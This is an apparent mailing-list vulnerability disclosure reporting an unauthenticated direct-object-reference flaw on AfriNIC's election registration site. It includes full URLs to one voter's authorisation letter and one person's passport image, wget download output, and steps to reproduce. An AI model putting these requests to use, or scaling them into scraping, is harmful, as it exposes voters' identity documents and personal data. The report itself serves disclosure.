[afnog] security problem on afrinic election platform

paul_mentat paul_mentat at proton.me
Sat Aug 2 17:02:49 UTC 2025 

Security Vulnerability Report
Report Title: Unauthorized Access to Voter Personal Information on registration.afrinic.net.
Report Date: [02/08/2025]
Severity:  High

1. Executive Summary
A security vulnerability was discovered in the afrinic election registration platform allowing unauthenticated users to access personal information of registered voters. The exposure includes passports and confidential information such as letters of authorization.

2. Affected System(s)
Component :

registration.afrinic.net

Version
n/a

Environment:
wp-content/uploads/fluentform/
https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf

3. Vulnerability Details
Type: Insecure Direct Object Reference (IDOR) / Broken Access Control
Impact: Exposure of Personally Identifiable Information (PII)
Authentication Required:  No
Exploitability: Remote, unauthenticated attackers can access voter data using direct URLs.
Example Requests:
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf

GET
https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg
Response:
ff-c7be0450e17f651c 100%[===================>] 333.34K  --.-KB/s    in 0.02s
2025-07-31 10:16:02 (13.8 MB/s) - ‘ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf’ saved [341340/341340]

2025-07-31 10:25:28 (16.8 MB/s) - ‘ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg’ saved [144116/144116]

4. Steps to Reproduce
1. Open browser or API tool (e.g., wget/postman).
Send a GET request to the API endpoint:

GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf

https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg

2. Open PDF file.
3. Observe that voter PII is returned without any authentication token or session check.
5. Impact Assessment
Exploitation Potential: High — can be automated and scaled to scrape the full voter database.

7. Disclosure Timeline
Date
Action
[02/08/2025]
Vulnerability discovered and published

8. References
OWASP: Insecure Direct Object References (IDOR)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://www.afnog.org/pipermail/afnog/attachments/20250802/dae66884/attachment.html>

More information about the afnog mailing list